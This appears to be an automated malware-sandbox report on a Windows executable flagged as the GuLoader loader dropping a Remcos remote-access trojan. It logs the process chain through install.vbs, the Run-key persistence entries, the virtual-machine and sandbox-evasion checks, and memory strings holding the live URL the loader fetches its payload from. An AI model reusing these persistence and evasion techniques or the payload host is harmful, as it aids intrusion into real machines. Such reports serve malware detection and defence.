            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 19_2_00586CCC NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 19_2_005870C5 NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 20_2_00586E0F NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 20_2_00584084 NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 20_2_00566970 NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 20_2_0057557A NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 21_2_00586E0F NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 21_2_00584084 NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 21_2_00566970 NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 21_2_0057557A NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeProcess Stats: CPU usage > 98%
            Source: C:\Users\user\Desktop\mU9H96igb3.exeProcess Stats: CPU usage > 98%
            Source: mU9H96igb3.exe, 00000002.00000000.137179026496.0000000000431000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamePattes5.exe vs mU9H96igb3.exe
            Source: mU9H96igb3.exe, 00000009.00000000.137581988864.0000000000431000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamePattes5.exe vs mU9H96igb3.exe
            Source: mU9H96igb3.exe, 00000009.00000002.137983891314.00000000009FC000.00000004.00000020.sdmpBinary or memory string: OriginalFilenamewscript.exe.mui` vs mU9H96igb3.exe
            Source: mU9H96igb3.exe, 00000009.00000002.137983891314.00000000009FC000.00000004.00000020.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs mU9H96igb3.exe
            Source: mU9H96igb3.exeBinary or memory string: OriginalFilenamePattes5.exe vs mU9H96igb3.exe
            Source: mU9H96igb3.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: Dlls.exe.9.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: C:\Users\user\Desktop\mU9H96igb3.exeSection loaded: edgegdi.dll
            Source: C:\Users\user\Desktop\mU9H96igb3.exeSection loaded: edgegdi.dll
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edgegdi.dll
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeSection loaded: edgegdi.dll
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeSection loaded: edgegdi.dll
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeSection loaded: edgegdi.dll
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeSection loaded: edgegdi.dll
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeSection loaded: edgegdi.dll
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeSection loaded: edgegdi.dll
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe 8A45D901CAB57A1B65C32AEA2452F56436DCF01C37BDF7875838E6054F395D90
            Source: mU9H96igb3.exeVirustotal: Detection: 32%
            Source: mU9H96igb3.exeMetadefender: Detection: 25%
            Source: mU9H96igb3.exeReversingLabs: Detection: 24%
            Source: C:\Users\user\Desktop\mU9H96igb3.exeFile read: C:\Users\user\Desktop\mU9H96igb3.exeJump to behavior
            Source: mU9H96igb3.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\mU9H96igb3.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Users\user\Desktop\mU9H96igb3.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
            Source: unknownProcess created: C:\Users\user\Desktop\mU9H96igb3.exe 'C:\Users\user\Desktop\mU9H96igb3.exe'
            Source: C:\Users\user\Desktop\mU9H96igb3.exeProcess created: C:\Users\user\Desktop\mU9H96igb3.exe 'C:\Users\user\Desktop\mU9H96igb3.exe'
            Source: C:\Users\user\Desktop\mU9H96igb3.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe'
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe C:\Users\user\AppData\Roaming\Adobes\Dlls.exe
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe 'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe'
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe 'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe'
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe 'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe'
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeProcess created: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe C:\Users\user\AppData\Roaming\Adobes\Dlls.exe
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeProcess created: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe 'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe'
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeProcess created: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe 'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe'
            Source: C:\Users\user\Desktop\mU9H96igb3.exeProcess created: C:\Users\user\Desktop\mU9H96igb3.exe 'C:\Users\user\Desktop\mU9H96igb3.exe'
            Source: C:\Users\user\Desktop\mU9H96igb3.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe'
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe C:\Users\user\AppData\Roaming\Adobes\Dlls.exe
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeProcess created: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe C:\Users\user\AppData\Roaming\Adobes\Dlls.exe
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeProcess created: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe 'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe'
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeProcess created: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe 'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe'
            Source: C:\Users\user\Desktop\mU9H96igb3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
            Source: C:\Users\user\Desktop\mU9H96igb3.exeFile created: C:\Users\user\AppData\Roaming\AdobesJump to behavior
            Source: C:\Users\user\Desktop\mU9H96igb3.exeFile created: C:\Users\user\AppData\Local\Temp\install.vbsJump to behavior
            Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@19/4@2/2
            Source: C:\Users\user\Desktop\mU9H96igb3.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1344:304:WilStaging_02
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeMutant created: \Sessions\1\BaseNamedObjects\Remcos-HCJBCA
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1344:120:WilError_03
            Source: C:\Users\user\Desktop\mU9H96igb3.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'
            Source: Window RecorderWindow detected: More than 3 window changes detected

            Data Obfuscation:

            barindex
            Yara detected GuLoaderShow sources
            Source: Yara matchFile source: 00000009.00000002.137982349025.0000000000560000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.138446041726.0000000002C10000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.139080067245.0000000000560000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.138640980805.0000000004F50000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.138719279197.0000000002340000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.137587044438.0000000002BE0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.139147557891.0000000000560000.00000040.00000001.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 2_2_0041A474 push ebp; ret
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 2_2_0040E9CB push ecx; retf
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 2_2_004191F0 push ecx; ret
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 2_2_004131A3 push ecx; ret
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 2_2_004086CE push eax; retf
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 2_2_00411ACE push ecx; ret
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 2_2_004132DE push ecx; ret
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 2_2_0041729D push edx; retf
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 2_2_0040DAAA push ecx; ret
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 2_2_0040E6B3 push ecx; ret
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 2_2_00417AB9 push eax; ret
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 2_2_0040A750 push ss; retf
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 2_2_00411B06 push ecx; ret
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 2_2_00407B81 push esi; retf
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 2_2_02BE267D push FFFFFF94h; retf
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 2_2_02C04084 push FFFFFF94h; retf
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 2_2_02BE2A10 push FFFFFF94h; retf
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 2_2_02BE1611 push esi; iretd
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 2_2_02BE67BC push es; ret
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 2_2_02BF6BF6 push FFFFFF94h; retf
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 2_2_02BE1327 push esi; iretd
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 2_2_02BE1366 push esi; iretd
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 9_2_0056267D push FFFFFF94h; retf
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 9_2_00584084 push FFFFFF94h; retf
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 9_2_00562A10 push FFFFFF94h; retf
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 9_2_00561611 push esi; iretd
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 9_2_00561366 push esi; iretd
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 9_2_00561327 push esi; iretd
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 9_2_00576BF6 push FFFFFF94h; retf
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 9_2_005667BC push es; ret
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 15_2_0041A474 push ebp; ret
            Source: C:\Users\user\Desktop\mU9H96igb3.exeFile created: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeJump to dropped file

            Boot Survival:

            barindex
            Creates an undocumented autostart registry key Show sources
            Source: C:\Users\user\Desktop\mU9H96igb3.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run ChromeJump to behavior
            Source: C:\Users\user\Desktop\mU9H96igb3.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ChromeJump to behavior
            Source: C:\Users\user\Desktop\mU9H96igb3.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ChromeJump to behavior
            Source: C:\Users\user\Desktop\mU9H96igb3.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\mU9H96igb3.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\mU9H96igb3.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\mU9H96igb3.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\mU9H96igb3.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\mU9H96igb3.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\mU9H96igb3.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\mU9H96igb3.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\mU9H96igb3.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\mU9H96igb3.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\mU9H96igb3.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\mU9H96igb3.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\mU9H96igb3.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\mU9H96igb3.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\mU9H96igb3.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\mU9H96igb3.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\mU9H96igb3.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\mU9H96igb3.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\mU9H96igb3.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\mU9H96igb3.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\mU9H96igb3.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\mU9H96igb3.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\mU9H96igb3.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Tries to detect Any.runShow sources
            Source: C:\Users\user\Desktop\mU9H96igb3.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\Desktop\mU9H96igb3.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Users\user\Desktop\mU9H96igb3.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\Desktop\mU9H96igb3.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeFile opened: C:\Program Files\qga\qga.exe
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: mU9H96igb3.exe, 00000002.00000002.137587305880.0000000002C10000.00000004.00000001.sdmp, mU9H96igb3.exe, 00000009.00000002.137982771661.00000000007C0000.00000004.00000001.sdmp, Dlls.exe, 0000000F.00000002.138445750884.0000000002300000.00000004.00000001.sdmp, Dlls.exe, 00000011.00000002.138639201953.0000000002230000.00000004.00000001.sdmp, Dlls.exe, 00000012.00000002.138719079086.00000000022B0000.00000004.00000001.sdmp, Dlls.exe, 00000013.00000002.142215774564.00000000006F0000.00000004.00000001.sdmp, Dlls.exe, 00000014.00000002.139080356064.00000000006B0000.00000004.00000001.sdmp, Dlls.exe, 00000015.00000002.139148878650.00000000023F0000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: Dlls.exe, 00000012.00000002.138718337791.000000000073C000.00000004.00000020.sdmpBinary or memory string: TROGRAM FILES\QEMU-GA\QEMU-GA.EXET
            Source: mU9H96igb3.exe, 00000002.00000002.137587305880.0000000002C10000.00000004.00000001.sdmp, Dlls.exe, 0000000F.00000002.138445750884.0000000002300000.00000004.00000001.sdmp, Dlls.exe, 00000011.00000002.138639201953.0000000002230000.00000004.00000001.sdmp, Dlls.exe, 00000012.00000002.138719079086.00000000022B0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
            Source: mU9H96igb3.exe, 00000009.00000002.137982771661.00000000007C0000.00000004.00000001.sdmp, Dlls.exe, 00000013.00000002.142215774564.00000000006F0000.00000004.00000001.sdmp, Dlls.exe, 00000014.00000002.139080356064.00000000006B0000.00000004.00000001.sdmp, Dlls.exe, 00000015.00000002.139148878650.00000000023F0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTP://IMPLANTECAPILARPEREIRA.COM/NETGENERATION10%20STARTUP_KCFPCD130.BINHTTP://IMPLANTECAPILARPEREIRA.COM/NETGENERATION10%20STARTUP_KCFPCD130.BIN
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe TID: 7708Thread sleep count: 9188 > 30
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe TID: 7708Thread sleep time: -45940s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeThread sleep count: Count: 9188 delay: -5
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 2_2_02BFFBA1 rdtsc
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeWindow / User API: threadDelayed 9188
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeWindow / User API: foregroundWindowGot 478
            Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\Users\user\Desktop\mU9H96igb3.exeSystem information queried: ModuleInformation
            Source: mU9H96igb3.exe, 00000002.00000002.137588937397.0000000004819000.00000004.00000001.sdmp, Dlls.exe, 0000000F.00000002.138447681995.0000000004899000.00000004.00000001.sdmp, Dlls.exe, 00000011.00000002.138641199655.0000000004FC9000.00000004.00000001.sdmp, Dlls.exe, 00000012.00000002.138720972509.0000000004A79000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
            Source: mU9H96igb3.exe, 00000002.00000002.137587305880.0000000002C10000.00000004.00000001.sdmp, Dlls.exe, 0000000F.00000002.138445750884.0000000002300000.00000004.00000001.sdmp, Dlls.exe, 00000011.00000002.138639201953.0000000002230000.00000004.00000001.sdmp, Dlls.exe, 00000012.00000002.138719079086.00000000022B0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
            Source: mU9H96igb3.exe, 00000002.00000002.137588937397.0000000004819000.00000004.00000001.sdmp, Dlls.exe, 0000000F.00000002.138447681995.0000000004899000.00000004.00000001.sdmp, Dlls.exe, 00000011.00000002.138641199655.0000000004FC9000.00000004.00000001.sdmp, Dlls.exe, 00000012.00000002.138720972509.0000000004A79000.00000004.00000001.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
            Source: Dlls.exe, 00000012.00000002.138718337791.000000000073C000.00000004.00000020.sdmpBinary or memory string: trogram Files\Qemu-ga\qemu-ga.exet
            Source: Dlls.exe, 00000013.00000002.142216361110.00000000008F5000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWw4
            Source: Dlls.exe, 00000012.00000002.138720972509.0000000004A79000.00000004.00000001.sdmpBinary or memory string: vmicshutdown
            Source: mU9H96igb3.exe, 00000002.00000002.137588937397.0000000004819000.00000004.00000001.sdmp, Dlls.exe, 0000000F.00000002.138447681995.0000000004899000.00000004.00000001.sdmp, Dlls.exe, 00000011.00000002.138641199655.0000000004FC9000.00000004.00000001.sdmp, Dlls.exe, 00000012.00000002.138720972509.0000000004A79000.00000004.00000001.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
            Source: mU9H96igb3.exe, 00000002.00000002.137588937397.0000000004819000.00000004.00000001.sdmp, Dlls.exe, 0000000F.00000002.138447681995.0000000004899000.00000004.00000001.sdmp, Dlls.exe, 00000011.00000002.138641199655.0000000004FC9000.00000004.00000001.sdmp, Dlls.exe, 00000012.00000002.138720972509.0000000004A79000.00000004.00000001.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
            Source: mU9H96igb3.exe, 00000009.00000002.137983452106.00000000009A5000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW(<
            Source: mU9H96igb3.exe, 00000002.00000002.137588937397.0000000004819000.00000004.00000001.sdmp, Dlls.exe, 0000000F.00000002.138447681995.0000000004899000.00000004.00000001.sdmp, Dlls.exe, 00000011.00000002.138641199655.0000000004FC9000.00000004.00000001.sdmp, Dlls.exe, 00000012.00000002.138720972509.0000000004A79000.00000004.00000001.sdmpBinary or memory string: Hyper-V Time Synchronization Service
            Source: Dlls.exe, 00000012.00000002.138720972509.0000000004A79000.00000004.00000001.sdmpBinary or memory string: vmicvss
            Source: mU9H96igb3.exe, 00000009.00000002.137983792450.00000000009E7000.00000004.00000020.sdmp, Dlls.exe, 00000013.00000002.142216361110.00000000008F5000.00000004.00000020.sdmp, Dlls.exe, 00000014.00000002.139080544159.0000000000758000.00000004.00000020.sdmp, Dlls.exe, 00000015.00000002.139148441525.000000000087B000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
            Source: mU9H96igb3.exe, 00000009.00000002.137982771661.00000000007C0000.00000004.00000001.sdmp, Dlls.exe, 00000013.00000002.142215774564.00000000006F0000.00000004.00000001.sdmp, Dlls.exe, 00000014.00000002.139080356064.00000000006B0000.00000004.00000001.sdmp, Dlls.exe, 00000015.00000002.139148878650.00000000023F0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=http://implantecapilarpereira.com/NetGeneration10%20Startup_KCFPCd130.binhttp://implantecapilarpereira.com/NetGeneration10%20Startup_KCFPCd130.bin
            Source: mU9H96igb3.exe, 00000002.00000002.137587305880.0000000002C10000.00000004.00000001.sdmp, mU9H96igb3.exe, 00000009.00000002.137982771661.00000000007C0000.00000004.00000001.sdmp, Dlls.exe, 0000000F.00000002.138445750884.0000000002300000.00000004.00000001.sdmp, Dlls.exe, 00000011.00000002.138639201953.0000000002230000.00000004.00000001.sdmp, Dlls.exe, 00000012.00000002.138719079086.00000000022B0000.00000004.00000001.sdmp, Dlls.exe, 00000013.00000002.142215774564.00000000006F0000.00000004.00000001.sdmp, Dlls.exe, 00000014.00000002.139080356064.00000000006B0000.00000004.00000001.sdmp, Dlls.exe, 00000015.00000002.139148878650.00000000023F0000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: mU9H96igb3.exe, 00000002.00000002.137588937397.0000000004819000.00000004.00000001.sdmp, Dlls.exe, 0000000F.00000002.138447681995.0000000004899000.00000004.00000001.sdmp, Dlls.exe, 00000011.00000002.138641199655.0000000004FC9000.00000004.00000001.sdmp, Dlls.exe, 00000012.00000002.138720972509.0000000004A79000.00000004.00000001.sdmpBinary or memory string: Hyper-V Data Exchange Service
            Source: mU9H96igb3.exe, 00000002.00000002.137588937397.0000000004819000.00000004.00000001.sdmp, Dlls.exe, 0000000F.00000002.138447681995.0000000004899000.00000004.00000001.sdmp, Dlls.exe, 00000011.00000002.138641199655.0000000004FC9000.00000004.00000001.sdmp, Dlls.exe, 00000012.00000002.138720972509.0000000004A79000.00000004.00000001.sdmpBinary or memory string: Hyper-V Heartbeat Service
            Source: Dlls.exe, 00000014.00000002.139081030100.00000000007C5000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW :WA
